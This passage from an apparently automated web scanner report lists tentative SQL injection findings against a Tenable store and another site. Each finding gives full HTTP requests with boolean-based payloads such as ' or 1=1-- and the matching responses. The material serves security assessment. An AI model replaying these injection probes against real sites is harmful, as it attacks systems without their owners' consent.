Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9

...[SNIP]...

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:54:14 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product11258655'%20or%201%3d2--%20&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9

...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:54:14 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 29916

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javasc
...[SNIP]...

1.18. https://store.tenable.com/index.php [cPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 10615830%20or%201%3d1--%20 and 10615830%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d1--%20&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:19 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d2--%20&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:47:19 GMT
Server: Apache
Set-Cookie: zenid=fe4444dea39d8df723e73385f265080f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28356

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />
<meta name="robots" content="noindex, nofollow" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cy
...[SNIP]...

1.19. https://store.tenable.com/index.php [cart_quantity parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The cart_quantity parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cart_quantity parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1'
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9
------WebKitFormBoundaryUOO8tZKUWmYxANA9--

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:00 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26402

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>The Shopping Cart : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<div class="messageStackCaution larger">
...[SNIP]...

Request 2

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1''
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9
------WebKitFormBoundaryUOO8tZKUWmYxANA9--

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:01 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26188

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>The Shopping Cart : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

1.20. https://store.tenable.com/index.php [main_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 11912762'%20or%201%3d1--%20 and 11912762'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info11912762'%20or%201%3d1--%20&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:04 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info11912762'%20or%201%3d2--%20&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:47:04 GMT
Server: Apache
Set-Cookie: zenid=3a66f5532203e85d8d78f3164792aeb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21052

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Page Not Found : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" />
<meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga
...[SNIP]...

1.21. https://store.tenable.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72255422%20or%201%3d1--%20 and 72255422%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:50:58 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:50:58 GMT
Server: Apache
Set-Cookie: zenid=9ab3f0946ae0b4784d1635c494781939; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28529

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javasc
...[SNIP]...

1.22. https://store.tenable.com/index.php [products_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The products_id parameter appears to be vulnerable to SQL injection attacks. The payloads 89838642%20or%201%3d1--%20 and 89838642%20or%201%3d2--%20 were each submitted in the products_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:52 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:47:52 GMT
Server: Apache
Set-Cookie: zenid=ceaa8dbe67c94b10d2c15c4816585a26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22852

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping " />
<meta name="description" content="Tenable Store - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ?
...[SNIP]...

1.23. https://store.tenable.com/index.php [zenid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The zenid parameter appears to be vulnerable to SQL injection attacks. The payloads 50326897'%20or%201%3d1--%20 and 50326897'%20or%201%3d2--%20 were each submitted in the zenid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:52:22 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 406 Not Acceptable
Date: Mon, 25 Apr 2011 23:52:22 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


1.24. http://www.afreshbunch.com/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /?page=login&cmd=save_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640
Content-Length: 810

